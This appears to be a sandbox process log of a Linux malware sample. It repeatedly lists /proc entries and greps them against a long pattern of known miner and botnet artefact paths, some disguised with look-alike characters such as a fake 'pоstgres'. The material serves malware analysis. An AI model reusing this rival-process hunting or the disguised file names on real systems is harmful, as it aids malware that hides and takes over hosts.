/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1036
-
-
/bin/grepgrep exe2⤵PID:1039
-
-
/bin/lsls -latrh /proc/7102⤵PID:1038
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1042
-
-
/bin/grepgrep exe2⤵PID:1046
-
-
/bin/lsls -latrh /proc/7122⤵PID:1045
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1048
-
-
/bin/lsls -latrh /proc/7182⤵PID:1051
-
-
/bin/grepgrep exe2⤵PID:1052
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1056
-
-
/bin/grepgrep exe2⤵PID:1060
-
-
/bin/lsls -latrh /proc/722⤵PID:1059
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1062
-
-
/bin/grepgrep exe2⤵PID:1066
-
-
/bin/lsls -latrh /proc/7282⤵PID:1065
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1070
-
-
/bin/lsls -latrh /proc/732⤵PID:1074
-
-
/bin/grepgrep exe2⤵PID:1075
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1081
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/742⤵PID:1083
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1088
-
-
/bin/grepgrep exe2⤵PID:1091
-
-
/bin/lsls -latrh /proc/752⤵PID:1090
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1094
-
-
/bin/grepgrep exe2⤵PID:1099
-
-
/bin/lsls -latrh /proc/762⤵PID:1098
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1101
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/lsls -latrh /proc/772⤵PID:1104
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/782⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/lsls -latrh /proc/792⤵PID:1115
-
-
/bin/grepgrep exe2⤵PID:1116
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1118
-
-
/bin/grepgrep exe2⤵PID:1121
-
-
/bin/lsls -latrh /proc/82⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1123
-
-
/bin/grepgrep exe2⤵PID:1126
-
-
/bin/lsls -latrh /proc/822⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1128
-
-
/bin/grepgrep exe2⤵PID:1131
-
-
/bin/lsls -latrh /proc/92⤵PID:1130
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1133
-
-
/bin/grepgrep exe2⤵PID:1136
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1135
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1138
-
-
/bin/grepgrep exe2⤵PID:1141
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1140
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1143
-
-
/bin/grepgrep exe2⤵PID:1146
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1148
-
-
/bin/grepgrep exe2⤵PID:1151
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1150
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1153
-
-
/bin/grepgrep exe2⤵PID:1156
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1155
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1158
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1160
-
-
/bin/grepgrep exe2⤵PID:1161
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1163
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1165
-
-
/bin/grepgrep exe2⤵PID:1166
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1168
-
-
/bin/grepgrep exe2⤵PID:1171
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1170
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1173
-
-
/bin/grepgrep exe2⤵PID:1176
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1175
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1178
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1180
-
-
/bin/grepgrep exe2⤵PID:1181
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1183
-
-
/bin/grepgrep exe2⤵PID:1186
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1185
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1188
-
-
/bin/grepgrep exe2⤵PID:1191
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1190
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1193
-
-
/bin/grepgrep exe2⤵PID:1196
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1198
-
-
/bin/grepgrep exe2⤵PID:1201
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1203
-
-
/bin/grepgrep exe2⤵PID:1206
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1208
-
-
/bin/grepgrep exe2⤵PID:1211
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1210
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1213
-
-
/bin/grepgrep exe2⤵PID:1216
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1215
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1218
-
-
/bin/grepgrep exe2⤵PID:1221
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1220
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1223
-
-
/bin/grepgrep exe2⤵PID:1226
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1225
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1228
-
-
/bin/grepgrep exe2⤵PID:1231
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1230
-
-
